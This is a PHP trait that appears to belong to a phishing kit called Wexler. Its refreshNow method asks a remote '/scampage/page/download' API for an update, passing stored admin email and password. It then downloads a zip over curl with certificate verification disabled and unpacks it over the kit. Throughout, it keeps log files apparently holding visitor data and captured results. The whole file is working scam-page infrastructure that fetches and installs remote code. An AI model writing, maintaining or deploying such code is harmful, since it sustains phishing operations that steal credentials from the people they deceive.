<?php
trait EPRefresher {
    public $refreshKeep = [
        '.wexler/configuration.json',
        '.wexler/log/visitor.txt',
        '.wexler/log/message.txt',
        '.wexler/log/result.txt',
    ];
    public $refreshKeeped = [];

    public function refreshNow() {
        global $_JSON;
    
        // Request File
        $requestFile = $this->apiGet('/scampage/page/download', ['pageid' => $this->configuration['pageid'], 'adminpanel' => isset($this->configuration['adminpanel']) ? $this->configuration['adminpanel'] : '', 'email' => isset($this->configuration['email']) ? $this->configuration['email'] : '', 'password' => isset($this->configuration['password']) ? $this->configuration['password'] : '']);
        if (isset($requestFile['data']['redirect'])) {
            if (!empty($requestFile['data']['redirect'])) {
                $path = dirname(__FILE__) . '/../../.wexler/refresh.zip';
                if (file_exists($path)) @unlink($path);
                if (function_exists('set_time_limit')) set_time_limit(0);

                // Download Shit
                $fp = fopen($path, 'w+');
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_USERAGENT, "Wexler/Updater (" . (isset($this->configuration['id']) ? $this->configuration['id'] : 'Unknown') . ")");
                curl_setopt($ch, CURLOPT_URL, $requestFile['data']['redirect']);
                curl_setopt($ch, CURLOPT_TIMEOUT, 100);
                curl_setopt($ch, CURLOPT_FILE, $fp); 
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                curl_setopt($ch, CURLOPT_HTTPHEADER, ['api-key: ' . (isset($this->configuration['apikey']) ? $this->configuration['apikey'] : 'Unknown')]);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
                curl_exec($ch); 
                curl_close($ch);
                fclose($fp);

                // Check
                if (file_exists($path)) {
                    // Copy Configuration
                    foreach ($this->refreshKeep as $key => $value) {
                        $absolut = dirname(__FILE__) . '/../../' . $value;
                        $newpath = $absolut . '.' . $this->RandUnik(4) . '.txt';
                        if (rename($absolut, $newpath)) {
                            $this->refreshKeeped[] = [
                                'before' => $absolut,
                                'after' => $newpath,
                            ];
                        }
                    }

                    $zip = new PclZip($path);
                    if ($zip->extract(PCLZIP_OPT_PATH, realpath(dirname(__FILE__) . '/../../')) == 0) {
                        foreach ($this->refreshKeeped as $key => $value) {
                            if (file_exists($value['before'])) @rename($value['before'], $value['before'] . '.' . $this->RandUnik(3) . 'bck');
                            if (file_exists($value['after'])) @rename($value['after'], $value['before']);

                        }
                        return ['status' => false, 'message' => 'Cannot Extract File.'];

                    } else {
                        @unlink($path);

                        // Reverse File
                        foreach ($this->refreshKeeped as $key => $value) {
                            if (file_exists($value['before'])) @rename($value['before'], $value['before'] . '.' . $this->RandUnik(3) . 'bck');
                            if (file_exists($value['after'])) @rename($value['after'], $value['before']);

                        }
                        
                        return ['status' => true, 'message' => 'Script has been updated.'];

                    }

                } else {
                    return ['status' => false, 'message' => 'Cannot Download File.'];

                }

                
            } else {
                return ['status' => false, 'message' => (isset($requestFile['message']) ? $requestFile['message'] : 'Unknown')];
    
            }

        } else {
            return ['status' => false, 'message' => (isset($requestFile['message']) ? $requestFile['message'] : 'Unknown')];

        }


        return ['status' => false, 'message' => 'Something went wrong.'];
    }
}